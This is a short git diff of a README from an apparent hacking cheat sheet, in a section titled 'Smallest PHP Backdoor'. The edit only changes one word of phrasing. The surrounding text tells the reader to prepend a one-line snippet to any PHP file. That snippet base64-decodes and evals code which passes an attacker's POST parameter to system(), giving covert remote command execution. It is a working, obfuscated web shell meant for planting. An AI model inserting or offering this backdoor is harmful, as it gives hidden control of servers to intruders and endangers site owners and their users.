hackerschoice/thc-tips-tricks-hacks-cheat-sheet/README.md

 <a id="php-backdoor"></a>
 **6.iv.
 Smallest PHP Backdoor**

-Add this line to the beginning of any PHP file:
+Add this line at the beginning of any PHP file:
 ```php
 <?php $i=base64_decode("aWYoaXNzZXQoJF9QT1NUWzBdKSl7c3lzdGVtKCRfUE9TVFswXSk7ZGllO30K");eval($i);?>
 ```